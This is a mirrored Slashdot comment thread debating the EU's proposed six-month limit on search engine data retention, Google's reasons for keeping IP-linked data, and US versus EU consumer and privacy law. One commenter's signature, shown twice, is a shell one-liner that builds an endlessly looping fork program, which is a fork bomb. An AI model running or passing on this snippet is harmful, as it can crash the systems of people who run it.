Slashdot Mirror
EU Recommends Slashing Search Data Retention
Wayland writes "The European Union's Article 29 Working Group has completed its PDF report on data protection and search engines. The group recommends that search engines only be allowed to hold onto search data for six months. 'To hang onto data for longer, search engine operators will need to show that such data is "strictly necessary" to offer the service. Google and others have long said that they need to retain data in order to refine search results, prevent click fraud, and launch new services like spell check (which, in Google's case, was built from user search data). In addition, the data that is kept will need to be guarded more closely. The working group concluded that IP addresses could be used to identify individuals; if not by the search engine itself, then by law enforcement or after a subpoena.'"
How much do you have to process the data so it stops counting for data protection issues?
In six months you can intermingle the data items so much there's no way of proving you're actually storing the data and you'd still have what you need of that data.
How does law track the identity line of a data item? Data has no memory and leaves no trace.
They're so concerned by the search engines that they seem to forget any website can get search queries and the IPs who performed them just by looking at the referrer field in the server logs. Why would it be less a "threat" for privacy than search engines ?
"search engine operators will need to show that such data is "strictly necessary" to offer the service."
If that is the law to follow, they will make it "strictly necessary" by adding features using that data, I guess. Just making it a bit harder is a lot of lawmaking for little effect.
"It's too bad that stupidity isn't painful." - Anton LaVey
And what exactly would the statute of limitations be on a google search? Oh wait, laws haven't caught up with technology yet...
And the way it's looking, law makers are dragging their feet on this type of thing just so the government has this massive grey area to work in. But, then again, I'm just at the bottom looking up. Perhaps they see it differently from their angle.
Briefly, so long as data is personally identifiable you must show that you are not retaining it longer than necessary. If I summarise or analyse data and remove information which makes it personally identifiable - names, addresses, telephone numbers, email accounts - then it is not covered.
IMHO the US stands in need of a Data Protection Act, as an amendment to the Constitution. The present Adnmninistration seems to be looking for ways of keeping track of its citizens which avoid the Constitution. Technically in Europe it is probably illegal to send personal data via GMail - because it is exporting it to a country that does not meet European standards for personal data protection.
From scarped cliff or quarried stone she cries "A thousand types are gone, I care for nothing, no not one."
I don't mind google and other places storing my data, if I want to surf anonymously it isn't hard for an decent method using tor or proxies. If by getting data from searches or activities I don't mind them noticing they keep their services free for me to use normally and anonymously I have no problems with this. But if I can no longer use the internet in any way anonymously I would definitely mind this. However, I don't think that it will come to that as so many other people want to use the internet anonymously.
Another method would be for the companies not to store the data linked to any personal information like name, user account, or ip address. One could use the data with no way to trace it back to the user.
What we need is an alternative search engine located in a country with very strict privacy laws, permissive copyright laws and outside of reach of most US subpoenas (except ones that meet that country's standards). If it becomes popular with security-paranoid geeks, it has a shot at 0.01% of Google's money, which should be enough to sustain a medium-sized company. Any recommendations?
I have been noticing one thing over many years now:
EU seems to protect its citizens and consumers from the rapacious hungry corporates more than US, as beacon of freedom, does.
Whether it is kicking Microsoft's ass all the way back to US, or
Forcing Apple to unblock its iTunes service in France, or
Cheaper medicine and medicare that keeps the private insurers at bay, or
Privacy laws and zealous courts (in germany) that force the government to disband its secret spyware projects, or
Libel laws that force newspapers to pay huge penalties to citizens for reckless lie mongering about their private lives, or
Airplane laws that force airlines to pay financial compensation to passengers for ditching them, or
Laws that jail CEOs and even the board for criminal conviction of corporations,...
While US zealously preserves corporate rights and treats them above human beings, allowing and authorizing torture, etc.
How come the so-called stiff-lip society values human freedoms so much, when the so-called Beacon of Democracy incarcerates its own citizens without trial.
And that too many EU nations don't even have constitutions that embody something like our First Amendment, etc.
"Doing what i can, with what i have." ~ Burt Gummer
It's simple, the US is (still, for some reason) afraid of the "communist" boogieman, and dismisses anything even remotely good for society as a whole, instead of rich individuals corporations, as communist propaganda.
It is all great and whatnot, as been mentioned above. Is it only me that sees this as the state wants to control who can access information? There have been several attempts to legislate that providers should retain data for the benefit of a state, and now they are also trying to legislate how much information should be freely accessible?
-A
Did anyone else misread the title?
This is not the sig you're looking for.
I has nothing to do with democracy, constitutions or political system.
Consumer protection laws have been in effect in europe since the middle ages, and are taken seriously by all parties. This is probably due to a tradition of draconian punishment for repeat offenders.
RTFA, lemming. The summary _again_ is inflammatory crap, yes, what else is new? But that's not what TFA says.
They're _not_ required to delete data completely, they're required to delete data that can identify you personally. Like IP, grouping between those searches, etc.
They do _not_ need that to refine their searches. If I search for, say, "Oracle auto-tuning", that's that. I expect the same result regardless of what my IP is, regardless of whether I searched for "WebSphere XA configuration" before, or "Fluffy tail buttplugs" or whatever. You can tune the search with just the search string. You don't need to track me for that.
_That_ is the friction between the EU and Google: that Google wants to keep that kind of identifiable information like the pair of IP and timestamp. Google has been playing bullshit handwaving games along the lines of "but we really need the IPs", then "but some people change IPs, so it won't identify them for ever", then "wait, would it be ok if we changed a bit or two of the IP?" along with a good helping of "but we'll keep it for 18 month before changing those bits anyway!"
And seeing Google protest at every step when they're told to stop tracking google, and, yes, exactly such bullshit fallacies as that they really need that IP to refine the search algorithm... is kinda funny. I guess "do no evil" was for when they were small and cuddly. Now that they're the 800 pound gorilla of the online advertising market, heh, turns out that they get as big a boner as any other PHBs out of trying to rape people's private data for a quick buck.
But, hey, I'm willing to be educated. _You_ tell me how deleting the IP information is gonna make search engines tank. Exactly which search algorithm relies on knowing my IP? No, seriously.
They can keep their statistic history for as long as they want to, but they can't keep your personal data. It's that simple, so let's stop handwaving strawman scenarios. They can (and should) keep information like "Shares of Moraelin Buttplugs Corp peaked at 1.50 Euro a share last year." But they have no reason to retain info like "Freddy Krueger lives on 22 Elm Street, and bought 2 shares of Dr Kevorkian's Suicide Clinic last year," just because he bought those 2 shares last year.
A financial advisor's or stock broker's job is to trade on the stock market. It's _not_ to collect your personal data and sell it to the highest bidder. It's not their job to data-mine your private information. It's that simple: stick to selling those shares.
Mind you, even for data mining, there's a fine line between information and trivia. Stuff like "which team won the most games last year" is information. You can make an informed prediction for this year based on it. Stuff like "which team won the most games on a Wednesday, in rain, under artificial light" is trivia.
Similarly, "people from Germany buy more economic games than those in the USA" is information. Stuff like "people living on odd numbered houses, and on streets whose name ends in a 'e', and are born on a rainy thursay, buy more economic games" is useless trivia.
"50% of the gamers are between 25 and 50 years old" is information. You can decide a target demographic based on that. "People born on a Tuesday the 14'th have the most gamers, at a whole 0.01% of the total" is trivia. Even if you figured out how to make games especially fit for people born on a Tuesday the 14'th, it's too thin a slice to individually bother with. Etc.
Going too deep into details, slices your data too thin, and produces meaningless trivia.
There simply is _no_ sane justification for the kinds of personal information that especially the USA PHB's try to collect. Other than spamming you personally
A polar bear is a cartesian bear after a coordinate transform.
We too have draconian punishment with about 10% of total US population in jail now.
But somehow our laws seem to punish the individual crimes, rather than the larger crimes by corporates or the government itself.
Why have we not had a CEO being jailed or hanged on behalf of a corporation which was criminally convicted of manslaughter like Exxon or the Bhopal Gas Tragedy in India?
Take for instance the zealousness of German judges in convicting Volkswagen execs: http://www.csmonitor.com/2008/0325/p12s01-woeu.html/
In US case, the government supports corporates explicitly and wishes courts release them from any liability for defective medicine even if it kills.
"Doing what i can, with what i have." ~ Burt Gummer
The grass is always greener on the other side I suppose. And libel/privacy laws don't seem such a good idea when you see the downside of them. Neither does criminalizing people like David Irving.
Any Americans fancy a citizenship-swap?
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
I wonder how this kind of legislation would be interpreted in the US. Corporations would argue they had the right to collect and anylze data for research as they see fit...however, as mentioned above, this poses a privacy issue becuase the governmet becomes the all seeing eye. A possible compromise would be giving corporations a right to withold data from the government? Just some food for thought since the U.S. is dominated by corporate interest.
Trying to install linux on my microwave, but keep getting a kernel panic...
That'd probably be because money talks in the "land of the free". Everyone is free to make their fortune, it's the "American dream", and so corporations have power. Add to that the fact that we've had centuries to do it wrong (e.g. previous feudal systems, which would have had a leaning towards supporting the nobility) and somewhere like America is bound to place a value on life that isn't equal to that of a corporation.
It's probably because we don't need one because we have a history instead. As above, we've had time to do it wrong and so we can now do it right without needing a document that tells us how to do it right. We do still have some EU-wide things similar to a constitution (like the Human Rights Bill) but they're all targetted and sensible and seemingly more relevant to the modern world.
I think the main difference is the system by which people come to power.
In most European countries ( and in effect the EU itself ) there is a plethora of political parties that are likely to come into power. With so many competing parties there is a large chance at least one of your competitors will point out your shady behavior, and it is thus easier to try to outdo them in positive ways rather than malicious ones.
In contrast, in the US the entire electoral system more or less favors a two party system, where the winner takes it all. In such a system you gain a lot by attacking a single enemy. If you're a democrat all you need to do is to break things for the republicans, and vice versa. Such tactics don't work if you have 5-6 potential candidates because if you try to fuck over 4 of your opponents you run the risk that they will conspire against you. The american system is very easily corrupted since once you have influence with the two main parties there is little to stop you, while gaining control of a 6-7 party parliament without anybody crying foul is more tricky.
Simply put, in the EU political parties compete for power, in the US there is more of a cartel or monopoly. You can also notice these trends if you look at individual EU countries. Britain has more of a one party system, and consequentially their politics are a lot more "american" than many other European ones.
It is also rather possible that the EU is merely better because it is relatively new at the moment, and that with time it will become corrupted as third parties learn to manipulate it. Time will tell...
I always laugh when I hear Americans talk about 'liberals' as being left-wing, given that that particular ideology is generally regarded as being at the centre of the political spectrum in Europe.
One of the things I notice on Slashdot is that there's a backlash whenever a government ever tries to legislate, especially when it's the EU trying to improve consumer protection - the general idea being that they should keep their collective noses out of other people's business.
I find it odd that Americans (as Slashdotters predominantly are), whose society prides itself on being democratic, would rather take power away from their democratic institutions and hand it to undemocratic corporations. The free market theoretically exists to control the amount of power that a corporation can accumulate, but I've found that Slashdotters oppose state intervention even in instances where the free market does not operate properly (i.e. monopoly situations).
It could be that this is because the US electoral system doesn't perform as it should. The usual example I use is the US Electoral College, where the presidential election is skewed by the first-past-the-post system used entirely out of context, and is provided for by the constitution. In cases where the electoral system is flawed, why should you trust a government any more than a corporation?
The GP mentions the issue of EU countries' constitutions - I live in the UK where there is no constitution, and ultimate power is invested in parliament, which makes it much easier to dispose of anachronisms in our voting systems.
Of course I might be on the wrong track entirely. It occurs to me that the most common sense I ever hear from politicians comes from two places: the UK House of Lords and the EU Commission - both unelected bodies. It's possible that politicians are more able to act in the public good when they don't have to worry about the next election.
This is dumb.
It isn't "how long it is kept for" but "what is kept".
Storing search criteria forever is only an issue if it can be used for identification or reveal information about someone.
So strip the "who" and keep the "what". And you can ditch the "who" part of the data immediately for the majority of people, and let people opt-in if they want history relevant services.
This signature intentionally left blank
Excuse me? 10%? That's news to me.
and these are just samples where i wish the ruthlessly effective libel law of EU applied in US.
Imagine the SBVT campaigners for bush being arrested, handcuffed and convicted to 3 months in prison.
Or Fox news CEO being convicted of Libel and forced to resign and pay huge compensations.
Or the bald idiot who exposed the CIA agent being forced to serve 18 yrs in prison.... At least in England which is the epitome of strong libel laws none of the examples you quoted would apply. Politicians generally don't sue journalists for publishing lies about them. A quick look at the English tabloids, particularly the ones owned by the people that own Fox news would tell you that. I suppose Jeffrey Archer is an example of a politician suing a newspaper, but it's not a very good case for libel laws. Since he was later found guilty of perjury during the case and sent to prison
In Singapore, English style libel laws have been used by the perpetual governing party to silence the opposition. In the cases you cite, the equivalent would have been Kerry or Obama being sued for libelling Bush because they got one fact wrong in an otherwise scrupulously truthful speech.
It's the same in Zimbabwe - the ruling party has used libel like laws to crush its critics. Imagine the SBVT campaigners for bush being arrested, handcuffed and convicted to 3 months in prison.
Or Fox news CEO being convicted of Libel and forced to resign and pay huge compensations.
Or the bald idiot who exposed the CIA agent being forced to serve 18 yrs in prison.... I think you're a thug quite frankly. You wish that draconian and antidemocratic laws be implemented so you can use them against your political enemies but you don't have the insight to realise that if those powers existed they would use them against you and your political friends. Especially given that the people in power are currently your enemies.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
The U.S. is ahead of Europe in some aspects of consumer protection. As a general rule, the consumer is allowed to return purchased goods to the store on a whim, while in Finland, at least, as a general rule, all sales are final. The Finnish consumer ombudsman has stated so clearly.
Just yesterday I tried returning a laptop to Verkkokauppa because I couldn't load linux on it. The customer service representative said it didn't promise it on the box and wouldn't take it back.
Not surprisingly, Finns purchase goods worth 10% less than the OECD average, while the Americans lead the pack in the amount of consumption.
That's because these corporations are the EU's rivals for that control. The EU prefers to keep that kind of control for itself.
I chose the name purely to mislead NSA.
-:)
"Doing what i can, with what i have." ~ Burt Gummer
Because business owners are citizens too. Google set up a service, allows any stranger to connect to its servers and gives them information for free. Nobody is required to use Google. As far as I see it, Google can do whatever it wants with its own private property. If people don't like that it records their information, don't use it.
EU protects its own businesses. Period.
One of the latest EU brouhaha's: EU companies are protesting USA steps against online gambling.
"The investigation could lead the 27-nation EU to file a complaint at the World Trade Organization in the latest international tussle over a growing business worth more than $15.5 billion a year.
"The U.S. has the right to address legitimate public policy concerns relating to Internet gambling, but discrimination against EU companies cannot be part of the policy mix," said EU Trade Commissioner Peter Mandelson."
http://www.msnbc.msn.com/id/23560417/
This may be unrelated to what Google is actually saving, but I will say this:
Google's spell checking is the best.
It is far more reliable than the majority of spell checkers, it almost always knows people's correct names, cities and states and principalities and so on and so forth.
I steal signatures. This one used to be yours.
It's probably because we don't need one because we have a history instead. As above, we've had time to do it wrong and so we can now do it right without needing a document that tells us how to do it right.
Here in the Netherlands we do have a written constitution but also more fundamental unwritten constitutional law in some areas. The argument often made against codification is that codification disentrenches it, making it possible for parliament to mess it up, and reduces its normative force. A quote from the English Wikipedia article:
Some of the most basic fundamental laws in the Dutch constitutional system are not explicitly expressed in the written Constitution. These include the rule that a cabinet must fall or an individual minister resign if a motion of non-confidence is passed by the Second Chamber; that the King cannot dissolve more than once a Second Chamber because of a conflict over a single political issue; that the ministerial responsibility extends to even private acts of the King if these have public consequences and that the First Chamber shall never block legislation for mere party politics [..] The unwritten laws are most influential when a cabinet is formed; the procedure is not regulated by the Constitution but purely based on tradition. [..] As Dutch political parties are strongly internally divided, shift alliance easily and are hesitant to commit themselves to any future coalition before the elections, a competent King can often have a decisive personal influence on what coalition is formed. [..] In common law systems these rules would not be seen as laws but as mere legal conventions as they cannot be upheld by judges; within the Dutch civil law system however they are part of the more extended Dutch-German legal concept of the Recht, the total "legal" normative structure, be it written or unwritten, so that they have full normative force. Indeed that force is much larger than with written constitutional rules; any breach of the unwritten rules would cause an immediate constitutional crisis.
Another important difference with US/French-style constitutional law is the absence of slogans [ibid]:
Contrary to many others, the Dutch constitution has no preamble stating the sovereignty by which it would be founded or the general principles on which it would be based. This is in line with a long tradition within the Dutch legislative to avoid any explicit reference to ideology or legal doctrine in its written laws.
Best of all we don't have "we the people" claptrap suggesting a sort of contract between you and the government. This is an unfortunate mixup of metaphors: if a parliament (or constitutional convention) decides by majority instead of by unanimity (like parliament used to do here), the decision is obviously not mandated by each individual citizen represented by an agent in parliament. The worst totalitarian governments in the world claimed being "we the people". Modesty is an important virtue, for a government and for its subjects.
One of the things I like about the EU, is that it sort of functions as an feudal unanimity parliament with the member states as members. But the increasing power of the European Parliament and the conflicts over the constitutional treaty (now Lisbon treaty; for instance whether god should be mentioned in the preamble) are reasons for worry.
It's pretty obvious that the grandparent exaggerated in order to make a point. The US incarceration rate is still very high however, last I heard it was around 1% of the adult population, and was thus higher than that of Russia.
Compare this to an average around 0.1%-0.2% in Europe, and an even lower rate in Japan. (and for an example from a perhaps more comparable nation, look no further than to your neighbor to the north)
As far as I see it, Google can do whatever it wants with its own private property.
A ridiculous assertion. Every person and every company in every country on earth with any sort of functioning government is restricted in Criminal, Civil and social and moral ways to various degrees as to what they can do with their 'private property'.
It might not be illegal per-se for google to freely sell information from its **US** servers to China about dissident-related search terms and the associated IPs for the Chinese government to track them down and execute them. But if they were found to be doing so it would be completely immoral and leave them potentially civilly liable, and most people would agree that such things should be made illegal if they become an issue. Private property rights are not an absolute, they have to be balanced against other rights like the right to life, or a fair trial or whatever.
It's accepted in most countries (and I believe implicit in the US constitution) that some rights *cannot* be given up, in this example by freely giving information to google. (And you'll note I'm not talking about the case of a company operating locally in China with local servers subject to local laws, which is a somewhat different case).
True. But so has US. US has violated its own laws and treaties to protect its farming, corn, banana, and steel industry even though WTO ruled against it many times.
I mean, US has always stated to other countries that they MUST follow WTO rulings and has used thugs to impose the same (eg Panama).
But somehow it fails to practice the preaching.
Isn't that odd?
Take for instance Antigua, a small country which poses no threat to US. WTO ruled in its favor against US and ordered US to pay restitution. What did US do? Showed the middle finger to WTO and told Antigua to invade US and pick up the money from its cold dead hands.
Obviously Antigua does not have that kinda power (Let's see US telling the same to Putin's Russia), so WTO gave it blanket permission to pirate holloywood movies.
Yup.
EU has a duty to protect its industries much like US does.
And EU has a big club to defend itself too. (Plus if US leans on it too much, EU can always switch allegiance to Russian bear).
US has met its match and i forsee a cold war between US and EU in a decade's time.
"Doing what i can, with what i have." ~ Burt Gummer
Duly noted, but nevertheless:
1. If they can do that kind of optimizations (which I highly doubt), then make it opt-in, not impossible to opt-out. If Sister Marion wants her bible searches optimized that thoroughly, or High Druid Matterson wants his searches free of the neighbours' puritan crap, then they can register and log in, you know.
There you go, it's an even easier way to track people who want to be tracked. More importantly, it's a responsible implementation. Just because you can do something, is no excuse to automatically do it to everyone without consent. (After all, you're probably perfectly equipped to fuck someone, but don't do it to everyone without consent either.)
I'm really genuinely tired of all sorts of stuff, ranging from nasty to irresponsible, being done under the blanket excuse, "but we tried to make it easier/better/etc for you!" Let me decide what good stuff I want, and which stuff I don't, ya know? Whether it's ads stuffed into my post box, or tracking my searches, or whatever... ask first. It's not that horribly alien a concept. You'd think most kids are taught to say "please" when they want something. At what point along becoming a big entrepreneur does one automatically forget all that?
2. More importantly: that way be the dragons.
To use your own example of a bible-belt town: There's more than one study which found that some of the most obnoxiously bible-thumping puritan communities, had some of the largest percentages of people who were into all sorts of perversions at home. Not that there's anything wrong with kinky stuff between consenting adults, mind you. But essentially a _lot_ of them do at home the same things they condemn as deadly sins in public.
Tracking it all to the point where you know exactly which searches are from Sister Marion, may well reveal that she didn't quite search for bible verses. Maybe she searched repeatedly for lesbian BDSM porn, plus for realistic vibrators and strap-ons. And maybe the stern fire-and-brimstone preacher, Pastor Brian, has been busily searching for gay porn, with a side-hobby of gay bestiality. And maybe the druid Matterson has done a search or two about prices on a sex change operation, so he can be a priestess of some nature goddess. Etc.
Nothing wrong with any of that, as such. But especially in that kind of a bible-thumping community, their lives could easily be ruined if that kind of info got leaked out, stolen, or just mis-used.
Even something as helpful-looking as just re-sorting their hits and adds based on who they are and what their personal search history is, can be essentially a leak waiting to happen. Think: pastor Brian gets his computer virused, the helpful neighbourhood nerd comes to have a look at it, has a search for "removing Stormbot", and the first ten pages of ads and links are variations of "18 year old boys sucking horse cock". You've essentially just told a stranger what the good pastor surfed for lately.
So, again, please make it opt in, if you want to provide that kind of a service.
A polar bear is a cartesian bear after a coordinate transform.
Well for one you are cherry picking here. The EU is not a single country. For every boon you list I could (as a German resident) list one thing that I like better about the US.
... if I operate a search engine based solely in the US, why would a EU visitor expect that I have to conform to EU regs?
AFAIK, Google's situation is different because it has a physical presence in Ireland and Belgium, and so they probably will have to eventually conform to the regulations in question. In principle, I like the EU personal data protection laws, but in general I believe that people need to protect themselves by controlling their own behavior rather than the actions of others.
[setenv RANT on; export RANT]
Want to protect your privacy? Read privacy policies on websites. You don't like Google's policies? Search elsewhere. Use EU-based search engines. Use search engines whose privacy statements conform to EU standards. Invent your own damn search engine that is based in the EU and conforms to EU laws. Who knows, maybe US surfers would prefer to use your engine in relative privacy rather than Google's. Maybe you'll be wildly successful at Google's expense.
[setenv JOKING on; export JOKING]
We already fought one war because of onnerous regulations from that side of the ocean. Don't piss us off again.
[setenv JOKING off; export JOKING]
[setenv RANT off; export RANT]
I prefer rogues to imbeciles because they sometimes take a rest.
I must point out that the Midwest and the Bible Belt have very little overlap. The "exact middle of the bible belt" is certainly not in the Midwest at all, thankfully.
http://en.wikipedia.org/wiki/Image:US_map-Midwest.PNG
http://en.wikipedia.org/wiki/Image:BibleBelt.png
-Wisconsinite
I still don't understand why Google can't provide privacy as an option. Presumably (a) my search history has some Google-specific data-mining value, and (b) can be sold to others. Fine. Google is a valuable service -- one of the most valuable online services. I'd be more than willing to pay for an account, willing to subsidize my privacy. And since Google owns DoubleClick, it's in a position to guarantee a lot of my privacy.
The phone companies do this today by selling unlisted numbers. I'd just like Google to do the same.
Say I get a Google account. Google provides me with the following things:
(a) No search, chat, or browsing history retention. This covers Google the search engine, gmail, DoubleClick, associating different IPs I've used, etc.
(b) HTTPS-based access to Google. My ISP and others with access to the network don't need to see my searches. Today that is not an option.
(c) Whatever magic is necessary to prevent sites from logging http referrer containing Google searches -- an initial redirect, whatever. It's none of their business what I was searching for on a separate site when I reached them. (Sure, I personally can block it, but a lot of people aren't aware that they're leaking information left and right.)
(d) (Optional, dunno how much this would cost me and most people can easily block these -- still, an interesting service) -- do not show ads on third-party websites -- Doubleclick, Google text ads, etc.
(e) IMAPS-based access to gmail
Granted, I have to trust Google not to actually not do the logging -- I can't provide a guarantee of privacy from my own computer, which slightly irks me -- but it's something that I'd really like.
Potential drawbacks to Google:
* May not be enough people aware of privacy issues to get such an account to pay for dev costs (which I would not expect to be significant).
* Might create opportunity for other ad banner companies that could provide marginally more money.
* Might make users aware of the fact that "regular" users suffer a lot of privacy loss
Today, if Google had a competitor that provided even just the non-search-retention data and was even remotely competitive in the UI department and search results department (I can dig through a bit more data, and can pull unnecessary crap from the UI client-side) I'd switch right away.
I'm pretty sure that there is no law that can force any company to *erase* data at a set rate. And for those that don't wish to deal with those issues (having their data kept for long periods of time), the solution is simple: don't use the service. It is your choice to go to google and use their search engine. If you don't like the terms of service, go use someone else.
All that being said, I, too, dislike their lengthy data retention policies, but I continue to use their services. Oh well.
What's done's in the past, forever shall last.
Work is work; life is life; fair is not!
Erm, no. You just don't hear about EU-internal actions because those aren't interesting to Slashdot.
The US decided to prevent its citizens from using online gambling sites situated outside the US. Obviously noone else is going to like that, especially when the US has treaties saying they won't do that.
Justice is the sheep getting arrested while an impartial judge declares the vote void.